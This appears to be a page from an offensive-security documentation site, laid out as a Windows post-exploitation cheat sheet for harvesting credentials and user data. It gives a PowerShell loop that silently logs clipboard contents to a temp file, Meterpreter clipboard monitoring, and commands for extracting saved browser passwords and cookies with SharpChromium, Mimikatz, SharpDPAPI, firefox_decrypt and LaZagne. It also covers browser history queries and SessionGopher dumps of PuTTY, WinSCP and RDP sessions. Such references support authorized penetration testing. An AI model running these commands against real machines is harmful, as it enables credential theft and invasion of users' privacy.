Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Clipboard Harvesting

Read Clipboard (PowerShell)

Get-Clipboard

Continuous Monitoring

while ($true) {
    $clip = Get-Clipboard 2>$null
    if ($clip) {
        $timestamp = Get-Date -Format "HH:mm:ss"
        "$timestamp : $clip" | Out-File -Append C:\Windows\Temp\clipboard.txt
    }
    Start-Sleep -Seconds 5
}

Meterpreter

meterpreter > load extapi
meterpreter > clipboard_get_data
meterpreter > clipboard_monitor_start
meterpreter > clipboard_monitor_dump

Browser Saved Passwords

Chrome

Database Location

C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data

SharpChromium

https://github.com/djhohnstein/SharpChromium
SharpChromium.exe logins
SharpChromium.exe history
SharpChromium.exe cookies

SharpWeb

https://github.com/djhohnstein/SharpWeb
SharpWeb.exe all

Mimikatz

dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

SharpDPAPI

SharpDPAPI.exe triage
SharpDPAPI.exe backupkey
SharpDPAPI.exe chrome

Firefox

Profile Location

C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\

Key Files

logins.json     — Encrypted credentials
key4.db         — Encryption key database
cert9.db        — Certificate store

firefox_decrypt

https://github.com/unode/firefox_decrypt

python3 firefox_decrypt.py "C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxx.default"

LaZagne

laZagne.exe browsers

Edge (Chromium)

Same structure as Chrome:
C:\Users\%USERNAME%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
SharpChromium.exe logins edge

Browser History

Chrome History

C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\History
sqlite3 History "SELECT url, title, visit_count FROM urls ORDER BY visit_count DESC LIMIT 50;"

Firefox History

sqlite3 places.sqlite "SELECT url, title, visit_count FROM moz_places ORDER BY visit_count DESC LIMIT 50;"

Bookmarks

Chrome

C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
JSON file — read directly:
Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Bookmarks" | ConvertFrom-Json | Select -ExpandProperty roots

All-in-One Tools

LaZagne

Extracts credentials from all browsers + many applications.
https://github.com/AlessandroZ/LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe wifi
laZagne.exe windows

SessionGopher (PowerShell)

Extracts saved sessions from PuTTY, WinSCP, FileZilla, RDP.
https://github.com/Arvanaghi/SessionGopher
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough

Quick Reference

TargetTool
ClipboardGet-Clipboard / Meterpreter extapi
Chrome/Edge passwordsSharpChromium / Mimikatz DPAPI
Firefox passwordsfirefox_decrypt / LaZagne
All browsersLaZagne / SharpWeb
PuTTY/WinSCP/RDP sessionsSessionGopher
Browser historysqlite3 on History/places.sqlite